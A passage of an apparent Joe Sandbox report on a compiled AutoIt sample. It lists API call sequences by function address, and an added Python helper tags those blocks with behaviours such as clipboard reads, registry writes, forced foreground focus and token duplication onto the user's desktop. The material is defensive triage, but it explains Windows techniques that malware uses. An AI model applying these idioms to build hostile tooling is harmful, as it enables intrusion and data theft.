                                                            • Instruction ID: 9e387959fb8625c16cab16a3a943d89478e2645f329299921ca25943a73bfe01
                                                            • Opcode Fuzzy Hash: 35726b73981abdb9f473fb9481dc749250f06b263f42d11c2fb2413668df8dce
                                                            • Instruction Fuzzy Hash: 54A13AB1508214ABC704EBA8C896DAFB7ECFF94700F40492DF596C3191EA34DA49CB63
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0087F221
                                                            • _wcscmp.LIBCMT ref: 0087F236
                                                            • _wcscmp.LIBCMT ref: 0087F24D
                                                            • GetFileAttributesW.KERNEL32(?), ref: 0087F25F
                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 0087F279
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0087F291
                                                            • FindClose.KERNEL32(00000000), ref: 0087F29C
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0087F2B8
                                                            • _wcscmp.LIBCMT ref: 0087F2DF
                                                            • _wcscmp.LIBCMT ref: 0087F2F6
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0087F308
                                                            • SetCurrentDirectoryW.KERNEL32(008CA5A0), ref: 0087F326
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0087F330
                                                            • FindClose.KERNEL32(00000000), ref: 0087F33D
                                                            • FindClose.KERNEL32(00000000), ref: 0087F34F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                            • String ID: *.*
                                                            • API String ID: 1803514871-438819550
                                                            • Opcode ID: a7422f33c44d8b6cc83088270bcfd2db7242809a9d50aca1d1c049ee24f5a3a3
                                                            • Instruction ID: 45a08eeb80018353ba3cd6508f3f55782457bf1c3f8812951a0a8495e8660e41
                                                            • Opcode Fuzzy Hash: a7422f33c44d8b6cc83088270bcfd2db7242809a9d50aca1d1c049ee24f5a3a3
                                                            • Instruction Fuzzy Hash: 6B31A5766002196BDB14EBB5DC49AEE73ACFF48360F148176EA18D3192EB34DA45CA50
                                                            APIs
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00890BDE
                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,0089F910,00000000,?,00000000,?,?), ref: 00890C4C
                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00890C94
                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00890D1D
                                                            • RegCloseKey.ADVAPI32(?), ref: 0089103D
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0089104A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Close$ConnectCreateRegistryValue
                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                            • API String ID: 536824911-966354055
                                                            • Opcode ID: 0ccabfbcb4b834ee189655ca62d7c27a99eefbd591f1b437fe643195f7232743
                                                            • Instruction ID: 3e0fb9519d7907486ff3d25fa5144b1fab71bbd5756846a755a9e2c7bc10f1be
                                                            • Opcode Fuzzy Hash: 0ccabfbcb4b834ee189655ca62d7c27a99eefbd591f1b437fe643195f7232743
                                                            • Instruction Fuzzy Hash: 6D022A752046119FCB14EF18C895E6AB7E9FF88714F08885DF999DB262CB31ED41CB82
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0087F37E
                                                            • _wcscmp.LIBCMT ref: 0087F393
                                                            • _wcscmp.LIBCMT ref: 0087F3AA
                                                              • Part of subcall function 008745C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 008745DC
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0087F3D9
                                                            • FindClose.KERNEL32(00000000), ref: 0087F3E4
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0087F400
                                                            • _wcscmp.LIBCMT ref: 0087F427
                                                            • _wcscmp.LIBCMT ref: 0087F43E
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0087F450
                                                            • SetCurrentDirectoryW.KERNEL32(008CA5A0), ref: 0087F46E
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0087F478
                                                            • FindClose.KERNEL32(00000000), ref: 0087F485
                                                            • FindClose.KERNEL32(00000000), ref: 0087F497
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                            • String ID: *.*
                                                            • API String ID: 1824444939-438819550
                                                            • Opcode ID: 1fd2cd03cf12fb2f677b464c25bb1cab43994d532fac3cf868f8c154fc8cb80f
                                                            • Instruction ID: 0eb9383cd7cb58363040271e41e9dd819ac73775a5c572375c63c3ef7fad4d97
                                                            • Opcode Fuzzy Hash: 1fd2cd03cf12fb2f677b464c25bb1cab43994d532fac3cf868f8c154fc8cb80f
                                                            • Instruction Fuzzy Hash: F631F5316012196BCF14ABB5EC88ADE73ACFF49324F148175EA18E31A2D734DE44CA64
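The API sequences in the entries above are the building blocks behind several of the report's signatures: FindWindowW("Shell_TrayWnd") followed by AttachThreadInput, keybd_event(0x12 = VK_MENU) and SetForegroundWindow is the well-known trick for forcing a window to the foreground; DuplicateTokenEx, OpenWindowStationW("winsta0"), SetProcessWindowStation and OpenDesktopW("default") prepare a duplicated token to run an interactive process on the user's desktop; OpenClipboard / GetClipboardData(CF_TEXT or CF_UNICODETEXT) / GlobalLock is the clipboard read behind "Contains functionality for read data from the clipboard"; RegCreateKeyExW then RegSetValueExW (with REG_* type strings) is a generic registry write, and FindFirstFileW("*.*") with SetCurrentDirectoryW and FindNextFileW is a recursive directory walk. In a compiled AutoIt binary (the report flags this sample as one) these shapes belong to the interpreter's built-in functions (WinActivate, RunAs, ClipGet, RegWrite, recursive file-attribute and file-time setters), so their presence shows capability of the runtime, not necessarily use by the embedded script. The following triage helper is an added example, not part of the Joe Sandbox report or of any tool it names: it parses APIs blocks in the format shown above and tags each block with the behaviour its ordered call sequence implies. The rule names are mine, and the sample blocks are bullets copied from the entries above into constructed strings.

```python
"""Tag the APIs blocks of a Joe Sandbox function listing with the behaviour they imply.

Added triage helper, not part of the Joe Sandbox report or of the AutoIt runtime:
rule names are the author's; sample blocks are bullets copied from the report.
"""
import re
from dataclasses import dataclass
from typing import Optional

# One bullet of an "APIs" block, e.g.
#   • AttachThreadInput.USER32(?,00000000,00000001), ref: 0084DAE8
#   • GetCurrentThreadId.KERNEL32 ref: 0084DACB
#   • Part of subcall function 00868CC3: GetLastError.KERNEL32 ref: 00868D47
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)


@dataclass(frozen=True)
class Call:
    api: str
    module: str
    args: tuple             # argument slots as printed: hex immediates, literals or "?"
    ref: str                # address of the call site
    subcall: Optional[str]  # callee address when the API is reached through a subcall


def parse_block(text: str) -> list:
    """Parse the bullets of one APIs block, keeping the listed (call-site) order."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
            calls.append(Call(m["api"], m["module"], args, m["ref"], m["sub"]))
    return calls


def in_order(calls, steps) -> bool:
    """True if every (api, arg-predicate) step is matched, each by a call after the previous match."""
    i = 0
    for c in calls:
        api, pred = steps[i]
        if c.api == api and (pred is None or pred(c.args)):
            i += 1
            if i == len(steps):
                return True
    return False


def first(*want):
    """Predicate: the first printed argument is one of the given literals."""
    return lambda a: bool(a) and a[0] in want


VK_MENU = "00000012"          # keybd_event(0x12): the ALT press that unlocks SetForegroundWindow
CF_TEXT, CF_UNICODETEXT = "00000001", "0000000D"

RULES = {
    "force-foreground-window":   [("FindWindowW", first("Shell_TrayWnd")), ("AttachThreadInput", None),
                                  ("keybd_event", first(VK_MENU)), ("SetForegroundWindow", None)],
    "interactive-station-token": [("DuplicateTokenEx", None), ("OpenWindowStationW", first("winsta0")),
                                  ("SetProcessWindowStation", None), ("OpenDesktopW", first("default"))],
    "clipboard-read":            [("OpenClipboard", None), ("GetClipboardData", first(CF_TEXT, CF_UNICODETEXT)),
                                  ("GlobalLock", None)],
    "registry-write":            [("RegCreateKeyExW", None), ("RegSetValueExW", None)],
    "recursive-directory-walk":  [("FindFirstFileW", first("*.*")), ("SetCurrentDirectoryW", None),
                                  ("FindNextFileW", None)],
}


def tag_block(text: str) -> list:
    """Names of the rules whose API sequence occurs, in order, in the block."""
    calls = parse_block(text)
    return [name for name, steps in RULES.items() if in_order(calls, steps)]


# Constructed samples: bullets copied from the function entries in the report.
FOREGROUND_BLOCK = """
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0084DA8E
• IsIconic.USER32(?), ref: 0084DA97
• SetForegroundWindow.USER32(?), ref: 0084DAAE
• GetCurrentThreadId.KERNEL32 ref: 0084DACB
• AttachThreadInput.USER32(?,00000000,00000001), ref: 0084DAE8
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0084DB10
• keybd_event.USER32(00000012,00000000), ref: 0084DB1B
• SetForegroundWindow.USER32(?), ref: 0084DB4A
• AttachThreadInput.USER32(?,?,00000000), ref: 0084DB71
"""
TOKEN_BLOCK = """
  • Part of subcall function 00868CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00868D3A
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008688ED
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00868915
• SetProcessWindowStation.USER32(00000000), ref: 00868938
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00868952
"""
CLIPBOARD_BLOCK = """
• OpenClipboard.USER32(0089F910), ref: 00884284
• GetClipboardData.USER32(0000000D), ref: 0088429A
• GlobalLock.KERNEL32(00000000), ref: 008842C2
• CloseClipboard.USER32 ref: 008842CC
"""
REGISTRY_BLOCK = """
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00890BDE
• RegCreateKeyExW.ADVAPI32(?,?,00000000,0089F910,00000000,?,00000000,?,?), ref: 00890C4C
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00890D1D
• RegCloseKey.ADVAPI32(00000000), ref: 0089104A
"""

if __name__ == "__main__":
    for name, block in [("foreground", FOREGROUND_BLOCK), ("token", TOKEN_BLOCK),
                        ("clipboard", CLIPBOARD_BLOCK), ("registry", REGISTRY_BLOCK)]:
        print(f"{name:10s} {parse_block(block)[0].ref}: {tag_block(block)}")
```

The matcher is deliberately an ordered-subsequence check rather than a set check: the foreground rule requires keybd_event(VK_MENU) to come after an AttachThreadInput, which is what distinguishes the focus-forcing idiom from an ordinary hotkey sender. The tags are capability markers only; for this sample they confirm what the AutoIt runtime links in, and the question of whether the script actually invokes them has to be answered from the decompiled script or the dynamic trace, not from this listing.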
                                                            APIs
                                                              • Part of subcall function 0086874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00868766
                                                              • Part of subcall function 0086874A: GetLastError.KERNEL32(?,0086822A,?,?,?), ref: 00868770
                                                              • Part of subcall function 0086874A: GetProcessHeap.KERNEL32(00000008,?,?,0086822A,?,?,?), ref: 0086877F
                                                              • Part of subcall function 0086874A: HeapAlloc.KERNEL32(00000000,?,0086822A,?,?,?), ref: 00868786
                                                              • Part of subcall function 0086874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0086879D
                                                              • Part of subcall function 008687E7: GetProcessHeap.KERNEL32(00000008,00868240,00000000,00000000,?,00868240,?), ref: 008687F3
                                                              • Part of subcall function 008687E7: HeapAlloc.KERNEL32(00000000,?,00868240,?), ref: 008687FA
                                                              • Part of subcall function 008687E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00868240,?), ref: 0086880B
                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0086825B
                                                            • _memset.LIBCMT ref: 00868270
                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0086828F
                                                            • GetLengthSid.ADVAPI32(?), ref: 008682A0
                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 008682DD
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008682F9
                                                            • GetLengthSid.ADVAPI32(?), ref: 00868316
                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00868325
                                                            • HeapAlloc.KERNEL32(00000000), ref: 0086832C
                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0086834D
                                                            • CopySid.ADVAPI32(00000000), ref: 00868354
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00868385
                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008683AB
                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 008683BF
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                             • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                            • String ID:
                                                            • API String ID: 3996160137-0
                                                            • Opcode ID: 70d0519bff27642fe3a18c45e781ceeb5fcdb3e8b1578785ba420f9ece227b91
                                                            • Instruction ID: c6f42a042d23b395b269831533a689091c3bb6f9688ee1aa614eeb12190db36e
                                                            • Opcode Fuzzy Hash: 70d0519bff27642fe3a18c45e781ceeb5fcdb3e8b1578785ba420f9ece227b91
                                                            • Instruction Fuzzy Hash: 39613B71900609EFDF04DFA4DD45AAEBBB9FF04700F14826AF919EA391DB319A15CB60
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                             • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                            • API String ID: 0-4052911093
                                                            • Opcode ID: 8beebd48d551a562e194cc4339037fa329fdd612cc7fc22929b7a51061235dd8
                                                            • Instruction ID: 9b5785049a97445087d25a8264393558a99fa11c631dc796acd98482e2a56866
                                                            • Opcode Fuzzy Hash: 8beebd48d551a562e194cc4339037fa329fdd612cc7fc22929b7a51061235dd8
                                                            • Instruction Fuzzy Hash: 38729375E00229DBDF14CF58D8857AEB7B5FF48310F19816AE949EB281EB309D81CB91
                                                            APIs
                                                              • Part of subcall function 008910A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00890038,?,?), ref: 008910BC
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00890737
                                                              • Part of subcall function 00819997: __itow.LIBCMT ref: 008199C2
                                                              • Part of subcall function 00819997: __swprintf.LIBCMT ref: 00819A0C
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 008907D6
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0089086E
                                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00890AAD
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00890ABA
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                             • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 1240663315-0
                                                            • Opcode ID: 2d135b2e6c59a3bfa1141165e21558cbf27f06b5c999dd376df925f03775b268
                                                            • Instruction ID: e70a49f2fa6e3a0cfa0aaca12e41eb9f36aeb94785d3b467a12d66a48b9a3b20
                                                            • Opcode Fuzzy Hash: 2d135b2e6c59a3bfa1141165e21558cbf27f06b5c999dd376df925f03775b268
                                                            • Instruction Fuzzy Hash: D0E15F71604210AFCB14EF28C895E6ABBE9FF89714B08856DF499D7262DB30ED41CF52
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 00870241
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 008702C2
                                                            • GetKeyState.USER32(000000A0), ref: 008702DD
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 008702F7
                                                            • GetKeyState.USER32(000000A1), ref: 0087030C
                                                            • GetAsyncKeyState.USER32(00000011), ref: 00870324
                                                            • GetKeyState.USER32(00000011), ref: 00870336
                                                            • GetAsyncKeyState.USER32(00000012), ref: 0087034E
                                                            • GetKeyState.USER32(00000012), ref: 00870360
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00870378
                                                            • GetKeyState.USER32(0000005B), ref: 0087038A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                             • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: 3290486af80e7d0de36f91be0db7f0796686d58d6ee0bfcc03b81e9aebffb528
                                                            • Instruction ID: f472e504c47241d35bef12d62ba3255bbc65f4c30982bdefc8b1a4403e00ac1e
                                                            • Opcode Fuzzy Hash: 3290486af80e7d0de36f91be0db7f0796686d58d6ee0bfcc03b81e9aebffb528
                                                            • Instruction Fuzzy Hash: D84187245147C9EAFF355B6488083A5BAA0FB12344F08C15ED6CDD66C7E794D9C48F92
                                                            APIs
                                                              • Part of subcall function 00819997: __itow.LIBCMT ref: 008199C2
                                                              • Part of subcall function 00819997: __swprintf.LIBCMT ref: 00819A0C
                                                            • CoInitialize.OLE32 ref: 00888718
                                                            • CoUninitialize.OLE32 ref: 00888723
                                                            • CoCreateInstance.OLE32(?,00000000,00000017,008A2BEC,?), ref: 00888783
                                                            • IIDFromString.OLE32(?,?), ref: 008887F6
                                                            • VariantInit.OLEAUT32(?), ref: 00888890
                                                            • VariantClear.OLEAUT32(?), ref: 008888F1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                             • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                            • API String ID: 834269672-1287834457
                                                            • Opcode ID: 701da6e8ed5358627be0e313c9c8037487fc35866c51eba903e8d70fd17d26f1
                                                            • Instruction ID: 4c59c483f8710295f175b07fdacccfcd2d5326c671eb00da64b933c47658ca3c
                                                            • Opcode Fuzzy Hash: 701da6e8ed5358627be0e313c9c8037487fc35866c51eba903e8d70fd17d26f1
                                                            • Instruction Fuzzy Hash: BE616A70608301DFD714EF28C948A6ABBE8FF44718F944829F995DB291DB74ED44CB92
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                             • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                            • String ID:
                                                            • API String ID: 1737998785-0
                                                            • Opcode ID: aa26433bfeb996b9e3d8caef3e018a0d254fa8965db88d2864b8b39342b59c8c
                                                            • Instruction ID: 5f70d31f9ffad8f2bcfb3406f36485f68b769e7f85977f69ae07cd6e1c7a037d
                                                            • Opcode Fuzzy Hash: aa26433bfeb996b9e3d8caef3e018a0d254fa8965db88d2864b8b39342b59c8c
                                                            • Instruction Fuzzy Hash: C021A1362012219FDB15BF64EC09B6D7BA8FF14715F14802AFA4ADB2B2DB30AC00CB55
                                                            APIs
                                                              • Part of subcall function 008148AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008148A1,?,?,008137C0,?), ref: 008148CE
                                                              • Part of subcall function 00874CD3: GetFileAttributesW.KERNEL32(?,00873947), ref: 00874CD4
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00873ADF
                                                            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00873B87
                                                            • MoveFileW.KERNEL32(?,?), ref: 00873B9A
                                                            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00873BB7
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00873BD9
                                                            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00873BF5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                             • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 4002782344-1173974218
                                                            • Opcode ID: 5ea990fb6f9ca86c471be37d349a8584f0dc26c424d07be031a4a5b2254c0632
                                                            • Instruction ID: a4322fce9826a9ef726637fb8535a81e12afdcab39ec95113e5c545645e70a8d
                                                            • Opcode Fuzzy Hash: 5ea990fb6f9ca86c471be37d349a8584f0dc26c424d07be031a4a5b2254c0632
                                                            • Instruction Fuzzy Hash: 34519C318001199ACB05EBA4DD929EDB779FF14300F2481A9E446F7096EF20AF49DBA2
                                                            APIs
                                                              • Part of subcall function 00817F41: _memmove.LIBCMT ref: 00817F82
                                                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0087F6AB
                                                            • Sleep.KERNEL32(0000000A), ref: 0087F6DB
                                                            • _wcscmp.LIBCMT ref: 0087F6EF
                                                            • _wcscmp.LIBCMT ref: 0087F70A
                                                            • FindNextFileW.KERNEL32(?,?), ref: 0087F7A8
                                                            • FindClose.KERNEL32(00000000), ref: 0087F7BE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                             • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                            • String ID: *.*
